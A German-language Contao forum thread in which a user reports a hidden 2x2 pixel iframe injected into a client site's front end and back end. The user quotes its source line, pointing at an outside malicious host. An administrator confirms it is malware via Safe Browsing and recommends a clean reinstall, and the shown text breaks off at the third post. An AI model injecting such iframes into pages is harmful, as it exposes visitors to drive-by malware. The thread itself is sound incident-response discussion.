Contao-Camp 2024
Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 40 von 49

Thema: Contao Website gehackt?

  1. #1
    Contao-Nutzer
    Registriert seit
    23.12.2010.
    Beiträge
    27

    Fehler Contao Website gehackt?

    Hallo Forum,

    ich bin neu hier und relativ neu bei Contao. Ich habe vor ca 3 Wochen für einen Kunden Contao 2.9.1 installiert und habe seit kurzem das Phänomen, dass ab und zu beim Aufruf sowohl des Frontends als auch des Backends ein 2x2 Pixel kleiner iframe auf der Seite zu sehen ist.

    Ich habe mir den Quelltext mit firebug angesehen und es wird direkt nach dem body tag sowohl Javascript-Code als auch der folgende iframe eingefügt.
    Code:
    <iframe src="http:// l. pprtest .info / in . cgi ? 2" width="2" height="2"></iframe>
    Kann mir das nicht erklären und vermute böses. Weiß jemand von Euch erstens, ob das zum System gehört oder ob es sich um einen Hack handelt und zweitens, wie ich heraus finden kann, wer (welche Datei) diesen Code einfügt? Habe alle mir verfügbaren logs angesehen (leider kein ftp), und nichts auffälliges sehen können. Auch konnte ich keine offensichtlich veränderte Datei finden.

    Ich kann hier leider die URL nicht veröffentlichen, da die Seite noch nicht für die Öffentlichkeit frei geschaltet ist und der Kunde es daher untersagt.

    Hoffe Ihr könnt mir hier helfen.

    Danke im Voraus und Grüße,
    TonCao

  2. #2
    Administratorin Avatar von lucina
    Registriert seit
    19.06.2009.
    Ort
    Kiel (DE)
    Beiträge
    7.332
    Partner-ID
    152
    User beschenken
    Wunschliste
    Contao-Projekt unterstützen

    Support Contao

    Standard

    Böse, siehe http://www.google.com/safebrowsing/d...l.pprtest.info

    Bleibt die Frage, wie das dort hingekommen ist. Und für dich die Aufgabe, neu und sauber zu installieren & Deine Inhalte zu portieren, ohne die Wanze mitzunehmen.

    Carolina.

    (So etwas kommt mir in letzter Zeit entschieden zu oft vor)

  3. #3